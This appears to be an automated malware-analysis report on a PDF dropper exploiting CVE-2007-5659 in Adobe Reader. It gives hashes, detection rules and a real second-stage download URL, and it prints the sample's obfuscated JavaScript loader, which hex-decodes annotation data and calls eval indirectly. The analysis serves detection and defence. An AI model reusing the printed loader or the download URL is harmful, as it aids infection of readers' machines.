Malicious PDF — malware analysis report

Static analysis result for SHA-256 004669320f2b9219…

Verdict: MALICIOUS
File type: PDF
Size: 17.5 KB
MD5: 17e223adc870a5e0beb7716a58237733
SHA-1: 12ad043b70b7b8a0d03042b9760718cad497f407
SHA-256: 004669320f2b92197f6b4f4a282125bd8de61fe787dea63419206ed5db30c320
Risk Score: 366

Malware Insights

MITRE ATT&CK

  • T1059.001 PowerShell
  • T1204.002 Malicious File

The PDF contains JavaScript that exploits CVE-2007-5659, targeting specific versions of Adobe Reader. The script is obfuscated and designed as a dropper, indicated by the use of String.fromCharCode for decoding and the embedded URL http://jikopa.info/page/gold.php/n00a106201r0010R43329fdcX9fe725c2Y5576ee99Z0100f080, which is likely used to download a second-stage payload. The presence of multiple anti-analysis checks further supports its malicious intent.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics (10)

  • Collab.collectEmailInfo — CVE-2007-5659 (severity: critical; confidence: CVE exact; rule: CVE_2007_5659)
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action (severity: low; 5 related findings; rule: PDF_JAVASCRIPT)
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) (severity: high; confidence: CVE likely; rule: PDF_JS_ADOBE_APSB08_13_PATCH_GATE)
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
  • PDF JavaScript exploit cluster (severity: critical; rule: PDF_JS_EXPLOIT_CLUSTER)
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Obfuscated multi-stage PDF JavaScript dropper (severity: high; rule: PDF_JS_OBFUSCATED_DROPPER)
    PDF JavaScript shows 4 independent signals of exploit-kit-style multi-stage obfuscation: annot_subject_stage, hex_codec_loop, incremental_eval_build, repeated_pluginschk. This is strongly consistent with pre-2011 Adobe Reader PDF droppers — OpenAction JS reads encoded data from annotation subjects, decodes it through one or more hex / base-N loops, and invokes eval indirectly (method name built one character at a time). The actual CVE is hidden in the final decoded layer and is not visible via static analysis.
  • PDF JavaScript shellcode contains an embedded download URL (severity: high; rule: PDF_JS_SHELLCODE_DOWNLOAD_URL)
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream (severity: low; rule: PDF_JS)
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ClamAV: Pdf.Exploit.Agent-35901 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Pdf.Exploit.Agent-35901
  • Suspicious extracted artifact (severity: info; rule: EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://jikopa.info/page/gold.php/n00a106201r0010R43329fdcX9fe725c2Y5576ee99Z0100f080 (referenced by PDF JavaScript)

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename: javascript_obj0009_000.js
SHA-256: 4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d
Kind: pdf-javascript-stream
Source: PDF /JS object 9 at offset 0x4383
Size: 469 bytes
Detection: ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script (first 1,000 lines of the extracted script):
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app[fnc]/**/(buf);
}

Filename: legacy_pdfkit_stage_000.js
SHA-256: 885781b9dda9f929e5d307a138cdf1cd3182b6a13e3c33e7e2c116c39515e429
Kind: deobfuscated-js
Source: z-percent UTF-16BE base-21 decoded JavaScript at offset 0x1AAF
Size: 5284 bytes
Detection: ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script (first 1,000 lines of the extracted script):

Filename: deobfuscated.js
SHA-256: 60296ff02c1cab849aa5804f10eb1e096c6fadc0d65f66bff3793769d741b588
Kind: deobfuscated-js
Source: PDF JavaScript deobfuscation pass
Size: 125471 bytes
Detection: ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). Carved artifact contains 2 long base64-like blob(s).
Preview script (first 1,000 lines of the extracted script):